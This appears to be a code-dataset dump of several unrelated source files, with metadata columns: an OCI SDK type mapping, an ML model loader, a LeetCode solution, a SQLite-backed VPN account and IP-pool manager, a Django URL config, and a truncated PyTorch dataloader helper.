from .object_storage_job_execution_result_details import ObjectStorageJobExecutionResultDetails
from .object_storage_job_execution_result_location import ObjectStorageJobExecutionResultLocation
from .parent_group import ParentGroup
from .pdb_metrics import PdbMetrics
from .pdb_status_details import PdbStatusDetails
from .remove_managed_database_from_managed_database_group_details import RemoveManagedDatabaseFromManagedDatabaseGroupDetails
from .reset_database_parameters_details import ResetDatabaseParametersDetails
from .sql_job import SqlJob
from .tablespace import Tablespace
from .tablespace_collection import TablespaceCollection
from .tablespace_summary import TablespaceSummary
from .time_series_metric_data_point import TimeSeriesMetricDataPoint
from .time_series_metric_definition import TimeSeriesMetricDefinition
from .update_database_parameters_result import UpdateDatabaseParametersResult
from .update_db_management_private_endpoint_details import UpdateDbManagementPrivateEndpointDetails
from .update_job_details import UpdateJobDetails
from .update_managed_database_group_details import UpdateManagedDatabaseGroupDetails
from .update_sql_job_details import UpdateSqlJobDetails
from .work_request import WorkRequest
from .work_request_collection import WorkRequestCollection
from .work_request_error import WorkRequestError
from .work_request_error_collection import WorkRequestErrorCollection
from .work_request_log_entry import WorkRequestLogEntry
from .work_request_log_entry_collection import WorkRequestLogEntryCollection
from .work_request_resource import WorkRequestResource
from .work_request_summary import WorkRequestSummary
# Maps type names to classes for database_management services.
database_management_type_mapping = {
"ActivityTimeSeriesMetrics": ActivityTimeSeriesMetrics,
"AddManagedDatabaseToManagedDatabaseGroupDetails": AddManagedDatabaseToManagedDatabaseGroupDetails,
"AllowedParameterValue": AllowedParameterValue,
"AssociatedDatabaseCollection": AssociatedDatabaseCollection,
"AssociatedDatabaseSummary": AssociatedDatabaseSummary,
"AwrDbCollection": AwrDbCollection,
"AwrDbCpuUsageCollection": AwrDbCpuUsageCollection,
"AwrDbCpuUsageSummary": AwrDbCpuUsageSummary,
"AwrDbMetricCollection": AwrDbMetricCollection,
"AwrDbMetricSummary": AwrDbMetricSummary,
"AwrDbParameterChangeCollection": AwrDbParameterChangeCollection,
"AwrDbParameterChangeSummary": AwrDbParameterChangeSummary,
"AwrDbParameterCollection": AwrDbParameterCollection,
"AwrDbParameterSummary": AwrDbParameterSummary,
"AwrDbReport": AwrDbReport,
"AwrDbSnapshotCollection": AwrDbSnapshotCollection,
"AwrDbSnapshotRangeCollection": AwrDbSnapshotRangeCollection,
"AwrDbSnapshotRangeSummary": AwrDbSnapshotRangeSummary,
"AwrDbSnapshotSummary": AwrDbSnapshotSummary,
"AwrDbSqlReport": AwrDbSqlReport,
"AwrDbSummary": AwrDbSummary,
"AwrDbSysstatCollection": AwrDbSysstatCollection,
"AwrDbSysstatSummary": AwrDbSysstatSummary,
"AwrDbTopWaitEventCollection": AwrDbTopWaitEventCollection,
"AwrDbTopWaitEventSummary": AwrDbTopWaitEventSummary,
"AwrDbWaitEventBucketCollection": AwrDbWaitEventBucketCollection,
"AwrDbWaitEventBucketSummary": AwrDbWaitEventBucketSummary,
"AwrDbWaitEventCollection": AwrDbWaitEventCollection,
"AwrDbWaitEventSummary": AwrDbWaitEventSummary,
"AwrQueryResult": AwrQueryResult,
"ChangeDatabaseParameterDetails": ChangeDatabaseParameterDetails,
"ChangeDatabaseParametersDetails": ChangeDatabaseParametersDetails,
"ChangeDbManagementPrivateEndpointCompartmentDetails": ChangeDbManagementPrivateEndpointCompartmentDetails,
"ChangeJobCompartmentDetails": ChangeJobCompartmentDetails,
"ChangeManagedDatabaseGroupCompartmentDetails": ChangeManagedDatabaseGroupCompartmentDetails,
"ChildDatabase": ChildDatabase,
"ClusterCacheMetric": ClusterCacheMetric,
"CreateDbManagementPrivateEndpointDetails": CreateDbManagementPrivateEndpointDetails,
"CreateJobDetails": CreateJobDetails,
"CreateManagedDatabaseGroupDetails": CreateManagedDatabaseGroupDetails,
"CreateSqlJobDetails": CreateSqlJobDetails,
"DatabaseCredentials": DatabaseCredentials,
"DatabaseFleetHealthMetrics": DatabaseFleetHealthMetrics,
"DatabaseHomeMetricDefinition": DatabaseHomeMetricDefinition,
"DatabaseHomeMetrics": DatabaseHomeMetrics,
"DatabaseIOAggregateMetrics": DatabaseIOAggregateMetrics,
"DatabaseInstanceHomeMetricsDefinition": DatabaseInstanceHomeMetricsDefinition,
"DatabaseParameterSummary": DatabaseParameterSummary,
"DatabaseParameterUpdateStatus": DatabaseParameterUpdateStatus,
"DatabaseParametersCollection": DatabaseParametersCollection,
"DatabaseStorageAggregateMetrics": DatabaseStorageAggregateMetrics,
"DatabaseTimeAggregateMetrics": DatabaseTimeAggregateMetrics,
"DatabaseUsageMetrics": DatabaseUsageMetrics,
"Datafile": Datafile,
"DbManagementPrivateEndpoint": DbManagementPrivateEndpoint,
"DbManagementPrivateEndpointCollection": DbManagementPrivateEndpointCollection,
"DbManagementPrivateEndpointSummary": DbManagementPrivateEndpointSummary,
"FleetMetricDefinition": FleetMetricDefinition,
"FleetMetricSummaryDefinition": FleetMetricSummaryDefinition,
"FleetStatusByCategory": FleetStatusByCategory,
"FleetSummary": FleetSummary,
"InstanceDetails": InstanceDetails,
"Job": Job,
"JobCollection": JobCollection,
"JobDatabase": JobDatabase,
"JobExecution": JobExecution,
"JobExecutionCollection": JobExecutionCollection,
"JobExecutionResultDetails": JobExecutionResultDetails,
"JobExecutionResultLocation": JobExecutionResultLocation,
"JobExecutionSummary": JobExecutionSummary,
"JobExecutionsStatusSummary": JobExecutionsStatusSummary,
"JobExecutionsStatusSummaryCollection": JobExecutionsStatusSummaryCollection,
"JobRun": JobRun,
"JobRunCollection": JobRunCollection,
"JobRunSummary": JobRunSummary,
"JobScheduleDetails": JobScheduleDetails,
"JobSummary": JobSummary,
"ManagedDatabase": ManagedDatabase,
"ManagedDatabaseCollection": ManagedDatabaseCollection,
"ManagedDatabaseGroup": ManagedDatabaseGroup,
"ManagedDatabaseGroupCollection": ManagedDatabaseGroupCollection,
"ManagedDatabaseGroupSummary": ManagedDatabaseGroupSummary,
"ManagedDatabaseSummary": ManagedDatabaseSummary,
"MemoryAggregateMetrics": MemoryAggregateMetrics,
"MetricDataPoint": MetricDataPoint,
"MetricDimensionDefinition": MetricDimensionDefinition,
"ObjectStorageJobExecutionResultDetails": ObjectStorageJobExecutionResultDetails,
"ObjectStorageJobExecutionResultLocation": ObjectStorageJobExecutionResultLocation,
"ParentGroup": ParentGroup,
"PdbMetrics": PdbMetrics,
"PdbStatusDetails": PdbStatusDetails,
"RemoveManagedDatabaseFromManagedDatabaseGroupDetails": RemoveManagedDatabaseFromManagedDatabaseGroupDetails,
"ResetDatabaseParametersDetails": ResetDatabaseParametersDetails,
"SqlJob": SqlJob,
"Tablespace": Tablespace,
"TablespaceCollection": TablespaceCollection,
"TablespaceSummary": TablespaceSummary,
"TimeSeriesMetricDataPoint": TimeSeriesMetricDataPoint,
"TimeSeriesMetricDefinition": TimeSeriesMetricDefinition,
"UpdateDatabaseParametersResult": UpdateDatabaseParametersResult,
"UpdateDbManagementPrivateEndpointDetails": UpdateDbManagementPrivateEndpointDetails,
"UpdateJobDetails": UpdateJobDetails,
"UpdateManagedDatabaseGroupDetails": UpdateManagedDatabaseGroupDetails,
"UpdateSqlJobDetails": UpdateSqlJobDetails,
"WorkRequest": WorkRequest,
"WorkRequestCollection": WorkRequestCollection,
"WorkRequestError": WorkRequestError,
"WorkRequestErrorCollection": WorkRequestErrorCollection,
"WorkRequestLogEntry": WorkRequestLogEntry,
"WorkRequestLogEntryCollection": WorkRequestLogEntryCollection,
"WorkRequestResource": WorkRequestResource,
"WorkRequestSummary": WorkRequestSummary
} | en | 0.853826 | # coding: utf-8 # Copyright (c) 2016, 2021, Oracle and/or its affiliates. All rights reserved. # This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license. # Maps type names to classes for database_management services. | 1.025189 | 1 |
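As a hedged illustration of how a name-to-class registry like the database_management_type_mapping above is typically used, the sketch below rebuilds a model object from a plain payload dict; the stand-in class, helper and payload are invented for the example and are not the OCI SDK's actual deserializer.

class WorkRequestError:
    # Stand-in class for the sketch; the real one lives in the SDK package above.
    def __init__(self, code=None, message=None):
        self.code = code
        self.message = message

type_mapping = {"WorkRequestError": WorkRequestError}

def build(type_name, payload):
    # Look up the class by its API type name and build it from a plain dict.
    return type_mapping[type_name](**payload)

err = build("WorkRequestError", {"code": "404", "message": "work request not found"})
print(err.code, err.message)  # 404 work request not found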
all_model.py | RajdeepBorgohain/NextDayProfitGeneration | 0 | 6616661 | <filename>all_model.py
import pickle
import numpy as np
import xgboost
# from xgboost import XGBClassifier
# import xgboost as xgb
"""Input: NULL
Output: Model
"""
def load_model():
load_model = pickle.load(open('model/xgb_f_beta_model.sav','rb'))
return load_model
""" Input: Model, Selected_date Data
Output: Predicted Score
"""
def prediction(model,data):
pred = model.predict_proba(data)
score = np.average(pred[:,1:])
return score | <filename>all_model.py
import pickle
import numpy as np
import xgboost
# from xgboost import XGBClassifier
# import xgboost as xgb
"""Input: NULL
Output: Model
"""
def load_model():
load_model = pickle.load(open('model/xgb_f_beta_model.sav','rb'))
return load_model
""" Input: Model, Selected_date Data
Output: Predicted Score
"""
def prediction(model,data):
pred = model.predict_proba(data)
score = np.average(pred[:,1:])
return score | en | 0.59902 | # from xgboost import XGBClassifier # import xgboost as xgb Input: NULL Output: Model Input: Model, Selected_date Data Output: Predicted Score | 2.776309 | 3 |
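For context on the record above, a hedged usage sketch of the prediction helper: a stub model stands in for the pickled XGBoost classifier so the example runs without model/xgb_f_beta_model.sav, and the feature matrix shape is an assumption.

import numpy as np

class StubModel:
    # Stand-in for the pickled model; returns fixed two-class probabilities.
    def predict_proba(self, data):
        return np.tile([0.3, 0.7], (len(data), 1))

def prediction(model, data):
    pred = model.predict_proba(data)
    return np.average(pred[:, 1:])  # average positive-class probability

print(prediction(StubModel(), np.zeros((10, 20))))  # 0.7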
problems/582.Kill_Process/li.py | subramp-prep/leetcode | 0 | 6616662 | # coding=utf-8
# Author: <NAME>
# Question: 582.Kill_Process
# Date: 2017-05-17 14:10 - 14:19
# Complexity: O(N)
import collections

class Solution(object):
def killProcess(self, pid, ppid, kill):
"""
:type pid: List[int]
:type ppid: List[int]
:type kill: int
:rtype: List[int]
"""
d = {}
for c, p in zip(pid, ppid):
if p not in d:
d[p] = []
d[p].append(c)
bfs = [kill]
for i in bfs:
bfs.extend(d.get(i, []))
return bfs
def killProcess(self, pid, ppid, kill):
d = collections.defaultdict(list)
for c, p in zip(pid, ppid):
d[p].append(c)
bfs = [kill]
for i in bfs:
bfs.extend(d.get(i, []))
return bfs
| # coding=utf-8
# Author: <NAME>
# Question: 582.Kill_Process
# Date: 2017-05-17 14:10 - 14:19
# Complexity: O(N)
import collections

class Solution(object):
def killProcess(self, pid, ppid, kill):
"""
:type pid: List[int]
:type ppid: List[int]
:type kill: int
:rtype: List[int]
"""
d = {}
for c, p in zip(pid, ppid):
if p not in d:
d[p] = []
d[p].append(c)
bfs = [kill]
for i in bfs:
bfs.extend(d.get(i, []))
return bfs
def killProcess(self, pid, ppid, kill):
d = collections.defaultdict(list)
for c, p in zip(pid, ppid):
d[p].append(c)
bfs = [kill]
for i in bfs:
bfs.extend(d.get(i, []))
return bfs
| en | 0.525457 | # coding=utf-8 # Author: <NAME> # Question: 582.Kill_Process # Date: 2017-05-17 14:10 - 14:19 # Complexity: O(N) :type pid: List[int] :type ppid: List[int] :type kill: int :rtype: List[int] | 3.228268 | 3 |
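A quick, self-contained check of the BFS approach in the record above; the sample pid/ppid lists are illustrative only.

import collections

def kill_process(pid, ppid, kill):
    children = collections.defaultdict(list)
    for c, p in zip(pid, ppid):
        children[p].append(c)
    order = [kill]
    for i in order:                       # BFS: children are appended while iterating
        order.extend(children.get(i, []))
    return order

print(kill_process([1, 3, 10, 5], [3, 0, 5, 3], 5))  # [5, 10]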
vpn_account.py | MalpraveCorp/VPN-Account-Network-Inventory-Manager | 0 | 6616663 | <reponame>MalpraveCorp/VPN-Account-Network-Inventory-Manager<gh_stars>0
#!/usr/bin/env python
# VPN account/network inventory
import argparse
import sqlite3
import json
from signal import signal, SIGPIPE, SIG_DFL
signal(SIGPIPE, SIG_DFL)
DEFAULT_GROUP = 'prod'
DEFAULT_SUBNET = '0'
DEFAULT_NETWORK = '10.10.'
def get_chunks(seq, size):
return (seq[pos:pos + size] for pos in range(0, len(seq), size))
def get_octets(address):
return str(address).split(".")
def printer(rows):
if ARGS["json"]:
print(json.dumps(rows, indent=4))
else:
for row in rows:
print(row)
def dict_factory(cursor, row):
dic = {}
for idx, col in enumerate(cursor.description):
dic[col[0]] = row[idx]
return dic
# def get_ippools_usage(conn):
# return {
# '.0.1': 0.40,
# '.0.4': 0.00
# }
def get_arguments():
parser = argparse.ArgumentParser(description='VPN account/network inventory.')
# User Actions
parser.add_argument('--create-account', help='Create a new VPN account.')
parser.add_argument('--create-account-hardcoded', help='Create a new VPN account with pre defined parameters.', nargs='*')
parser.add_argument('--revoke-account', help='Revoke an existing VPN account.')
# parser.add_argument('--modify', help='Modify an existing VPN account, e.g. move to another group or change details.')
# parser.add_argument('--password-reset', help='Reset a VPN account password.')
# Pool Actions
parser.add_argument('--create-pool', help='Create a new IP pool with provided subnet.', nargs='*')
# Usage View
parser.add_argument('--show-accounts', help='Shows accounts.', action='store_true')
parser.add_argument('--show-accounts-full', help='Shows accounts with respective IP pool info.', action='store_true')
parser.add_argument('--show-pools', help='Shows IP Pools.', action='store_true')
parser.add_argument('--show-pool-usage', help='Shows IP Pool usage.', action='store_true')
parser.add_argument('--show-subnet-usage', help='Shows subnet usage.', action='store_true')
# View format
parser.add_argument('--json', help='Prints data in JSON format.', action='store_true')
parsed_args = parser.parse_args()
# parser.print_help()
return vars(parsed_args)
def get_pools(subnet, name):
""" Generates list of IP pairs on a /20 available for the given subnet."""
subnet = int(subnet)
ret = []
for third_octete in range(subnet, subnet+16):
# each client needs 4 ips - must be divisible by 4
for forth_octete in get_chunks(range(1, 253), 4):
# Allows for 0.0/20 0.16/20 0.32/20
network = DEFAULT_NETWORK + str(third_octete)
ret.append([network + '.0', name, forth_octete[0], forth_octete[1], network + '.255', 0])
return ret
def get_accounts():
""" Get all user accounts """
sql = 'SELECT * FROM accounts'
CUR.execute(sql)
return CUR.fetchall()
def get_accounts_full():
""" Get all user accounts along with respective ip addresses assigned """
sql = 'SELECT * FROM accounts LEFT JOIN ippools on accounts.ippool_id = ippools.id'
CUR.execute(sql)
return CUR.fetchall()
def get_ippools():
""" Get all IP pools"""
sql = 'SELECT * FROM ippools'
CUR.execute(sql)
return CUR.fetchall()
def get_database():
""" Return instance of database connection"""
connection = sqlite3.connect('vpnaccount.db')
connection.row_factory = dict_factory
return connection
def create_tables():
""" Initialize database with new tables """
sql = """CREATE TABLE IF NOT EXISTS accounts
(id INTEGER PRIMARY KEY AUTOINCREMENT,
username VARCHAR(100) NOT NULL,
email VARCHAR(100) NOT NULL,
status INTEGER,
ippool_id INTEGER,
CONSTRAINT username_unique UNIQUE (username)
)"""
CONN.cursor().execute(sql)
sql = """CREATE TABLE IF NOT EXISTS ippools
(id INTEGER PRIMARY KEY AUTOINCREMENT,
network VARCHAR(100) NOT NULL,
subnet VARCHAR(100) NOT NULL,
first_ip VARCHAR(100) NOT NULL,
last_ip VARCHAR(100) NOT NULL,
broadcast VARCHAR(100) NOT NULL,
status INTEGER,
CONSTRAINT network_address UNIQUE (network, first_ip, last_ip)
)"""
CONN.cursor().execute(sql)
CONN.commit()
def get_available_ip():
""" Returns the first IP pair available """
cur = CONN.cursor()
cur.execute('SELECT * FROM ippools WHERE status = 0')
return cur.fetchone()
def get_ippool_id(first_ip, last_ip, network, subnet):
""" Returns IP pool id for given input parameters"""
cur = CONN.cursor()
cur.execute('SELECT * FROM ippools WHERE network = ? AND first_ip = ? AND last_ip = ? and subnet LIKE ?', [network, first_ip, last_ip, subnet])
return cur.fetchone()
def create_ippools(subnet=DEFAULT_SUBNET, name=DEFAULT_GROUP):
""" Populates IP pools database """
CONN.cursor().executemany('INSERT INTO ippools(network, subnet, first_ip, last_ip, broadcast, status) VALUES (?,?,?,?,?,?)', get_pools(subnet, name))
CONN.commit()
def create_user(email):
""" Create a new user and assign it an IP pair """
ip_address_id = get_available_ip()['id']
CONN.cursor().execute('UPDATE ippools SET status = 1 WHERE id = ?', (ip_address_id,))
CONN.cursor().execute('INSERT INTO accounts(username, email, status, ippool_id) VALUES (?,?,?,?)', [email, email, 1, ip_address_id])
CONN.commit()
def create_user_hardcoded(email, first_ip, last_ip, subnet):
""" Create a new user from existing system, preserving ip pairs """
network = DEFAULT_NETWORK + get_octets(first_ip)[2] + '.0'
first_ip = get_octets(first_ip)[3]
last_ip = get_octets(last_ip)[3]
print(first_ip, last_ip, network, subnet)
ip_address_id = get_ippool_id(first_ip, last_ip, network, subnet)['id']
CONN.cursor().execute('UPDATE ippools SET status = 1 WHERE id = ?', (ip_address_id,))
CONN.cursor().execute('INSERT INTO accounts(username, email, status, ippool_id) VALUES (?,?,?,?)', [email, email, 1, ip_address_id])
CONN.commit()
def revoke_user(email):
""" Disable user and free its IP pair """
cur = CONN.cursor()
cur.execute('SELECT * FROM accounts WHERE username LIKE ?', (email,))
account = cur.fetchone()
cur.execute('UPDATE accounts SET status = 0 WHERE id = ?', (int(account['id']), )) # also remove ippool_id?
cur.execute('UPDATE ippools SET status = 0 WHERE id = ?', (int(account['ippool_id']), ))
CONN.commit()
def handler_create_pool(arguments):
if len(arguments) == 2:
print('Creating subnet with provided name and range.')
create_ippools(arguments[0], arguments[1])
elif len(arguments) == 1:
        print('You should provide either no arguments (for defaults) or a subnet and group name, e.g. --create-pool 16 prod')
else:
print('Creating default subnet.')
create_ippools()
def handler_create_user_hardcoded(arguments):
if len(arguments) != 4:
        print('You need to specify 4 params: EMAIL FIRSTIP LASTIP SUBNET')
return
email = arguments[0]
first_ip = arguments[1]
last_ip = arguments[2]
subnet = arguments[3]
create_user_hardcoded(email, first_ip, last_ip, subnet)
#
# main
#
CONN = get_database()
# if not database_initialized:
create_tables()
CUR = CONN.cursor()
ARGS = get_arguments()
if ARGS["show_accounts"]:
printer(get_accounts())
if ARGS["show_accounts_full"]:
printer(get_accounts_full())
if ARGS["show_pools"]:
printer(get_ippools())
if ARGS["create_account"] is not None:
create_user(ARGS["create_account"])
if ARGS["create_account_hardcoded"] is not None:
handler_create_user_hardcoded(ARGS["create_account_hardcoded"])
if ARGS["revoke_account"] is not None:
revoke_user(ARGS["revoke_account"])
if ARGS["create_pool"] is not None:
handler_create_pool(ARGS["create_pool"])
CONN.close()
| #!/usr/bin/env python
# VPN account/network inventory
import argparse
import sqlite3
import json
from signal import signal, SIGPIPE, SIG_DFL
signal(SIGPIPE, SIG_DFL)
DEFAULT_GROUP = 'prod'
DEFAULT_SUBNET = '0'
DEFAULT_NETWORK = '10.10.'
def get_chunks(seq, size):
return (seq[pos:pos + size] for pos in range(0, len(seq), size))
def get_octets(address):
return str(address).split(".")
def printer(rows):
if ARGS["json"]:
print(json.dumps(rows, indent=4))
else:
for row in rows:
print(row)
def dict_factory(cursor, row):
dic = {}
for idx, col in enumerate(cursor.description):
dic[col[0]] = row[idx]
return dic
# def get_ippools_usage(conn):
# return {
# '.0.1': 0.40,
# '.0.4': 0.00
# }
def get_arguments():
parser = argparse.ArgumentParser(description='VPN account/network inventory.')
# User Actions
parser.add_argument('--create-account', help='Create a new VPN account.')
parser.add_argument('--create-account-hardcoded', help='Create a new VPN account with pre defined parameters.', nargs='*')
parser.add_argument('--revoke-account', help='Revoke an existing VPN account.')
# parser.add_argument('--modify', help='Modify an existing VPN account, e.g. move to another group or change details.')
# parser.add_argument('--password-reset', help='Reset a VPN account password.')
# Pool Actions
parser.add_argument('--create-pool', help='Create a new IP pool with provided subnet.', nargs='*')
# Usage View
parser.add_argument('--show-accounts', help='Shows accounts.', action='store_true')
parser.add_argument('--show-accounts-full', help='Shows accounts with respective IP pool info.', action='store_true')
parser.add_argument('--show-pools', help='Shows IP Pools.', action='store_true')
parser.add_argument('--show-pool-usage', help='Shows IP Pool usage.', action='store_true')
parser.add_argument('--show-subnet-usage', help='Shows subnet usage.', action='store_true')
# View format
parser.add_argument('--json', help='Prints data in JSON format.', action='store_true')
parsed_args = parser.parse_args()
# parser.print_help()
return vars(parsed_args)
def get_pools(subnet, name):
""" Generates list of IP pairs on a /20 available for the given subnet."""
subnet = int(subnet)
ret = []
for third_octete in range(subnet, subnet+16):
# each client needs 4 ips - must be divisible by 4
for forth_octete in get_chunks(range(1, 253), 4):
# Allows for 0.0/20 0.16/20 0.32/20
network = DEFAULT_NETWORK + str(third_octete)
ret.append([network + '.0', name, forth_octete[0], forth_octete[1], network + '.255', 0])
return ret
def get_accounts():
""" Get all user accounts """
sql = 'SELECT * FROM accounts'
CUR.execute(sql)
return CUR.fetchall()
def get_accounts_full():
""" Get all user accounts along with respective ip addresses assigned """
sql = 'SELECT * FROM accounts LEFT JOIN ippools on accounts.ippool_id = ippools.id'
CUR.execute(sql)
return CUR.fetchall()
def get_ippools():
""" Get all IP pools"""
sql = 'SELECT * FROM ippools'
CUR.execute(sql)
return CUR.fetchall()
def get_database():
""" Return instance of database connection"""
connection = sqlite3.connect('vpnaccount.db')
connection.row_factory = dict_factory
return connection
def create_tables():
""" Initialize database with new tables """
sql = """CREATE TABLE IF NOT EXISTS accounts
(id INTEGER PRIMARY KEY AUTOINCREMENT,
username VARCHAR(100) NOT NULL,
email VARCHAR(100) NOT NULL,
status INTEGER,
ippool_id INTEGER,
CONSTRAINT username_unique UNIQUE (username)
)"""
CONN.cursor().execute(sql)
sql = """CREATE TABLE IF NOT EXISTS ippools
(id INTEGER PRIMARY KEY AUTOINCREMENT,
network VARCHAR(100) NOT NULL,
subnet VARCHAR(100) NOT NULL,
first_ip VARCHAR(100) NOT NULL,
last_ip VARCHAR(100) NOT NULL,
broadcast VARCHAR(100) NOT NULL,
status INTEGER,
CONSTRAINT network_address UNIQUE (network, first_ip, last_ip)
)"""
CONN.cursor().execute(sql)
CONN.commit()
def get_available_ip():
""" Returns the first IP pair available """
cur = CONN.cursor()
cur.execute('SELECT * FROM ippools WHERE status = 0')
return cur.fetchone()
def get_ippool_id(first_ip, last_ip, network, subnet):
""" Returns IP pool id for given input parameters"""
cur = CONN.cursor()
cur.execute('SELECT * FROM ippools WHERE network = ? AND first_ip = ? AND last_ip = ? and subnet LIKE ?', [network, first_ip, last_ip, subnet])
return cur.fetchone()
def create_ippools(subnet=DEFAULT_SUBNET, name=DEFAULT_GROUP):
""" Populates IP pools database """
CONN.cursor().executemany('INSERT INTO ippools(network, subnet, first_ip, last_ip, broadcast, status) VALUES (?,?,?,?,?,?)', get_pools(subnet, name))
CONN.commit()
def create_user(email):
""" Create a new user and assign it an IP pair """
ip_address_id = get_available_ip()['id']
CONN.cursor().execute('UPDATE ippools SET status = 1 WHERE id = ?', (ip_address_id,))
CONN.cursor().execute('INSERT INTO accounts(username, email, status, ippool_id) VALUES (?,?,?,?)', [email, email, 1, ip_address_id])
CONN.commit()
def create_user_hardcoded(email, first_ip, last_ip, subnet):
""" Create a new user from existing system, preserving ip pairs """
network = DEFAULT_NETWORK + get_octets(first_ip)[2] + '.0'
first_ip = get_octets(first_ip)[3]
last_ip = get_octets(last_ip)[3]
print(first_ip, last_ip, network, subnet)
ip_address_id = get_ippool_id(first_ip, last_ip, network, subnet)['id']
CONN.cursor().execute('UPDATE ippools SET status = 1 WHERE id = ?', (ip_address_id,))
CONN.cursor().execute('INSERT INTO accounts(username, email, status, ippool_id) VALUES (?,?,?,?)', [email, email, 1, ip_address_id])
CONN.commit()
def revoke_user(email):
""" Disable user and free its IP pair """
cur = CONN.cursor()
cur.execute('SELECT * FROM accounts WHERE username LIKE ?', (email,))
account = cur.fetchone()
cur.execute('UPDATE accounts SET status = 0 WHERE id = ?', (int(account['id']), )) # also remove ippool_id?
cur.execute('UPDATE ippools SET status = 0 WHERE id = ?', (int(account['ippool_id']), ))
CONN.commit()
def handler_create_pool(arguments):
if len(arguments) == 2:
print('Creating subnet with provided name and range.')
create_ippools(arguments[0], arguments[1])
elif len(arguments) == 1:
        print('You should provide either no arguments (for defaults) or a subnet and group name, e.g. --create-pool 16 prod')
else:
print('Creating default subnet.')
create_ippools()
def handler_create_user_hardcoded(arguments):
if len(arguments) != 4:
        print('You need to specify 4 params: EMAIL FIRSTIP LASTIP SUBNET')
return
email = arguments[0]
first_ip = arguments[1]
last_ip = arguments[2]
subnet = arguments[3]
create_user_hardcoded(email, first_ip, last_ip, subnet)
#
# main
#
CONN = get_database()
# if not database_initialized:
create_tables()
CUR = CONN.cursor()
ARGS = get_arguments()
if ARGS["show_accounts"]:
printer(get_accounts())
if ARGS["show_accounts_full"]:
printer(get_accounts_full())
if ARGS["show_pools"]:
printer(get_ippools())
if ARGS["create_account"] is not None:
create_user(ARGS["create_account"])
if ARGS["create_account_hardcoded"] is not None:
handler_create_user_hardcoded(ARGS["create_account_hardcoded"])
if ARGS["revoke_account"] is not None:
revoke_user(ARGS["revoke_account"])
if ARGS["create_pool"] is not None:
handler_create_pool(ARGS["create_pool"])
CONN.close() | en | 0.502017 | #!/usr/bin/env python # VPN account/network inventory # def get_ippools_usage(conn): # return { # '.0.1': 0.40, # '.0.4': 0.00 # } # User Actions # parser.add_argument('--modify', help='Modify an existing VPN account, e.g. move to another group or change details.') # parser.add_argument('--password-reset', help='Reset a VPN account password.') # Pool Actions # Usage View # View format # parser.print_help() Generates list of IP pairs on a /20 available for the given subnet. # each client needs 4 ips - must be divisible by 4 # Allows for 0.0/20 0.16/20 0.32/20 Get all user accounts Get all user accounts along with respective ip addresses assigned Get all IP pools Return instance of database connection Initialize database with new tables CREATE TABLE IF NOT EXISTS accounts (id INTEGER PRIMARY KEY AUTOINCREMENT, username VARCHAR(100) NOT NULL, email VARCHAR(100) NOT NULL, status INTEGER, ippool_id INTEGER, CONSTRAINT username_unique UNIQUE (username) ) CREATE TABLE IF NOT EXISTS ippools (id INTEGER PRIMARY KEY AUTOINCREMENT, network VARCHAR(100) NOT NULL, subnet VARCHAR(100) NOT NULL, first_ip VARCHAR(100) NOT NULL, last_ip VARCHAR(100) NOT NULL, broadcast VARCHAR(100) NOT NULL, status INTEGER, CONSTRAINT network_address UNIQUE (network, first_ip, last_ip) ) Returns the first IP pair available Returns IP pool id for given input parameters Populates IP pools database Create a new user and assign it an IP pair Create a new user from existing system, preserving ip pairs Disable user and free its IP pair # also remove ippool_id? # # main # # if not database_initialized: | 2.634128 | 3 |
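To make the pool layout in the record above concrete, here is a self-contained rerun of its pair-generation logic; the subnet and group name passed in are arbitrary example values.

DEFAULT_NETWORK = "10.10."

def get_chunks(seq, size):
    return (seq[pos:pos + size] for pos in range(0, len(seq), size))

def get_pools(subnet, name):
    rows = []
    for third_octet in range(int(subnet), int(subnet) + 16):
        for pair in get_chunks(range(1, 253), 4):   # 4 addresses reserved per client
            network = DEFAULT_NETWORK + str(third_octet)
            rows.append([network + ".0", name, pair[0], pair[1], network + ".255", 0])
    return rows

pools = get_pools("0", "prod")
print(len(pools), pools[0])  # 1008 ['10.10.0.0', 'prod', 1, 2, '10.10.0.255', 0]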
Modulo 1/Aula09_Exercicios/exercicios01.py | icarogoggin/BlueEdtech | 0 | 6616664 | <reponame>icarogoggin/BlueEdtech<gh_stars>0
#1. Write a Python program that asks the user which multiplication table they want to see, then prints that table.
n1 = int(input('Digite a tabuada que você quer calcular: '))
for i in range(1,11):
multiplicacao = n1*i
print(f'{n1} X {i} = {multiplicacao}')
| #1. Crie um código em Python que pede qual tabuada o usuário quer ver, em seguida imprima essa tabuada.
n1 = int(input('Digite a tabuada que você quer calcular: '))
for i in range(1,11):
multiplicacao = n1*i
print(f'{n1} X {i} = {multiplicacao}') | pt | 0.987395 | #1. Crie um código em Python que pede qual tabuada o usuário quer ver, em seguida imprima essa tabuada. | 3.969363 | 4 |
ht/airyslide/urls.py | caoxuCarlos/htyw_ecust | 0 | 6616665 | <filename>ht/airyslide/urls.py
from django.urls import path
from . import views
urlpatterns = [
path('', views.slide, name='slide-first'),
path('service1', views.making, name='service1'),
path('service2', views.modification, name='service2'),
]
| <filename>ht/airyslide/urls.py
from django.urls import path
from . import views
urlpatterns = [
path('', views.slide, name='slide-first'),
path('service1', views.making, name='service1'),
path('service2', views.modification, name='service2'),
]
| none | 1 | 1.976994 | 2 | |
tests/utils.py | SauravMaheshkar/paww | 0 | 6616666 | import numpy as np
import pandas as pd
from sklearn.model_selection import StratifiedKFold
from torch.utils.data import DataLoader
from paww.augmentation import get_transforms
from paww.dataloader import PawwDataset
def get_dataloader(cfg):
train = pd.read_csv("data/petfinder-pawpularity-score/train.csv")
def get_train_file_path(image_id):
return "data/petfinder-pawpularity-score/train/{}.jpg".format(image_id)
train["file_path"] = train["Id"].apply(get_train_file_path)
num_bins = int(np.floor(1 + np.log2(len(train))))
train["bins"] = pd.cut(train[cfg["target_col"]], bins=num_bins, labels=False)
Fold = StratifiedKFold(
n_splits=cfg["folds"], shuffle=True, random_state=cfg["seed"]
)
for n, (train_index, val_index) in enumerate(Fold.split(train, train["bins"])):
train.loc[val_index, "fold"] = int(n)
train["fold"] = train["fold"].astype(int)
trn_idx = train[train["fold"] != 0].index
train_folds = train.loc[trn_idx].reset_index(drop=True)
train_dataset = PawwDataset(
cfg, train_folds, transform=get_transforms(cfg, data="train")
)
dataloader = DataLoader(
train_dataset,
batch_size=cfg["batch_size"],
shuffle=True,
num_workers=cfg["num_workers"],
pin_memory=True,
drop_last=True,
)
return dataloader
| import numpy as np
import pandas as pd
from sklearn.model_selection import StratifiedKFold
from torch.utils.data import DataLoader
from paww.augmentation import get_transforms
